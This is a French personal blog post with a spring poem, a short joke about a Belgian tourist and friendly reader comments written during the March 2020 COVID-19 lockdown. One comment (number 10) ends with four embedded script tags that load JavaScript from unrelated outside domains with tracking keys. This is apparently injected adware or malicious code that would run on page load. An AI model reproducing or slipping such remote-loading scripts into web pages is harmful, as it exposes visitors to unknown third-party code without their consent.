• La gazette du mercredi

    La gazette du mercredi

     

     

    La gazette du mercredi

    Monsieur Printemps est un bel homme
    Toujours pimpant frais et dispos
    Il enfile son habit vert pomme
    Et n'est jamais en repos
    Il met son nez à la fenêtre
    Dès que revient le mois d'avril

     

    Coucou les p'tits loups

     

    Mercredi est arrivé, et comme toujours

    un plaisir de vous lire , et de partager des "tites" images.

    C'est naif, je sais , mais c'est aussi très rafraichissant

    et surtout sans prise de tête.

    Ma devise est de plus en plus en plus d'actualité

    "N'attendez à demain

    cueillez des aujourd'hui les roses de la vie"

    Et les roses qu'on peut cueillir en ce moment, c'est

    le petit coup de fil à la famille, aux amis un petit sms,

    un message sur les blogs,

    et quand on apprend que tout le monde va bien,

    on a cueilli la plus  belle rose de la journée

     un gros bisou les loulous

     

    NB

    Ma Léa est revenue parmi nous

    elle nous met de jolies choses dans sa rubrique.

    Quand vous mettez un petit com attention

    c'est Léa pas moi  merci à tous et toutes

     

     

     

    La gazette du mercredi

     

     

    La gazette du mercredi

     

     

    L'hôtel en bord de mer :

    Un Belge vient d'arriver à l'hôtel en bord de mer

    et s'inquiète des horaires du restaurant.

    - Le petit déjeuner est servi de 7 heures à 11 heures,

    le déjeuner de midi à 14 heures

    et le dîner de 19 à 22 heures ...

    - Ah, c'est embêtant, fait le vacancier !

    - Pourquoi ? -

    Parce que ça ne nous laissera pas beaucoup de temps pour aller à la plage…

    La gazette du mercredi

     

    « PrintempsTubes femmes illustrées png »

  • Commentaires

    14
    Mercredi 25 Mars 2020 à 18:28

    Bonjour Marjolaine

    Arrivée tardive mais je me suis endormie sur le divan !

    Le beau temps est là, nous avons une mésange qui a emménagé dans le nid accroché au chêne, c'est un plaisir de l'observer discrètement pour ne pas la déranger dans ses préparatifs !

    Mettons des couleurs dans notre vie si possible, cet endroit est comme un jardin rempli de fleurs, prenons le comme un rayon de soleil, nous en avons bien besoin en cette période difficile.

    Prenez bien soin de vous.  smile

     

     

     

    13
    Mercredi 25 Mars 2020 à 17:00

    Bonjour Marjolaine

    je suis en retard sur ce beau billet avec des voisins nous sommes occupé

    d'une collecte pour des locataires de l'immeuble 3 personnes qui se son suicidés

    hier matin en fait les gens sont humain 3150 euros dans deux immeubles

    bisou mon amie passe un bon mercredi le soleil brille pour nous,

     

     

    12
    Mercredi 25 Mars 2020 à 16:48

    Coucou chère Marjolaine,

    Tes jolies créations nous donnent un petit regain d'énergie et je t'en remercie.

    C'est toujours un plaisir de lire ta gazette, laquelle apporte soleil et bonne humeur.

    Ici, nous avons du soleil; c'est plus agréable, surtout en cette période de confinement.

    Il nous faut rester chez nous afin que la COVID-19 (coronavirus) cesse  cesse de se propager.

    Passe une bonne fin de journée!

    Bisou

    Huguette

    11
    Mercredi 25 Mars 2020 à 15:37

    Bonjour Marjolaine,

    Tes images comme tu le dis sont peut-être naïve, mais tellement belles que je ne m'en lasse pas et j'aime beaucoup les employer.

    Je t'ai envoyé un message, tu me diras si c'est possible.

    Nous sommes tous confinés au Québec, tout le monde à la maison à part les services de santé, les épiceries et la société des alcools, et ce qui est absolument nécessaire.

    Je t'embrasse amicalement,

    Allison

    10
    Mercredi 25 Mars 2020 à 14:42

    Coucou Marjolaine,

    Merci pour cet article, un beau poème sur le printemps, de l'humour !

    Bon après-midi toujours ensoleillé ; Bisous

    https://nsm09.casimages.com/img/2020/02/03//2002031145548200316631301.jpg

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1585143588586" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    9
    Mercredi 25 Mars 2020 à 14:29

    Bonjour ma chère Marjolaine

    merci de visite sur ma page

    et ici une superbe page comme toujours varié et belles images

     moi je ne sors pas obligation juste courses

     une fois la semaine , si tous faire cela

     ça finira vite , bisou mon amie bon demain jeudi ,

     

    8
    Mercredi 25 Mars 2020 à 11:50

    Bonne journée ☼ bisous

    Fichier

    7
    Mercredi 25 Mars 2020 à 11:30

    Grand Merci pour ton joli sourire de chaque jour...La Douce Humeur est comme

    un Rendez Vous d'Amour...Profitons....

    Merci pour cette jolie page,le naïf est une chose merveilleuse et je dis Oui..oui..oui...

    Gros bisous ...tout plein*

    soin656656e5r6er5

    6
    Mercredi 25 Mars 2020 à 11:01

    bonjour Marjolaine

    je viens te faire un petit coucou

    en ce mercredi ensoleillé

    encore un moment bien agréable dans ta gazette

    une bien jolie création

    un gentil messages pour nous et une blague de bon gout

    merci a toi c est sympa de partager ta bonne humeur

    plein de bisous d amitié et a demain

    prends bien soin de toi

    (si tu veux me faire une signature bretonne je suis preneuse)

    ♥ lisia ♥

    5
    Mercredi 25 Mars 2020 à 10:41

    bonjour Marjolaine tu vas bien et Antoine aussi

    belle ta creation j'adore du soleil chez toi

    dans ce blog j'aime

    et l'histoire aussi

    prenez bien soin de vous

    Elyci

    4
    Mercredi 25 Mars 2020 à 10:32

    Bonjour ma petite Marjolaine,

    C'est toujours un plaisir de lire ta gazette qui apporte du soleil et de la bonne humeur.

    J'espère que tu vas bien ainsi que Antoine ? Fernand et moi ça va.Le soleil est là, ça fait du bien de le voir.

    Je n'ai pas trop le moral, suis découragée et pas motivée pour chanter, je reprendrais lorsque tout ira bien...Heureusement qu'il y a Internet pour s'occuper, et aussi les DVD, la télévision et la musique.

    Aujourd'hui c'est l'anniversaire de mon papa et je ne peux pas lui apporter son cadeau, cela me manque de ne pas voir mes parents et Fernand aussi.Heureusement on peut leur téléphoner.  

    Passes une bonne journée, gros bisous ma douce amie.

    Florence

    3
    Mercredi 25 Mars 2020 à 10:30

    je les apprécie tes créas justement parce-qu'elles paraissent enfantines mais ça doit donner du travail. 

    Passe une bonne journée, j'ai pris l'air j'ai étendu une lessive dehors. 

    2
    Mercredi 25 Mars 2020 à 10:11

    Bonjour MARJOLAINE  un coucou du matin ,

    merci pour ta joli page du jour ,

    après midi sera jardinage

    profiter du beau soleil pas chaud mais ciel bleu

    ça change des pluie des temps derniers 

    bisou amitié bon mercredi ,

     

    1
    Mercredi 25 Mars 2020 à 08:47

    bonjour mon amie oui dommage le soleil est la mais il faut absolument rester chez nous c est serieux autrement je doute que lon puisse arreter ce virus bonne journée mon amie gros bisous bisous 

    amitiés prenez soins de vous 

    Vous devez être connecté pour commenter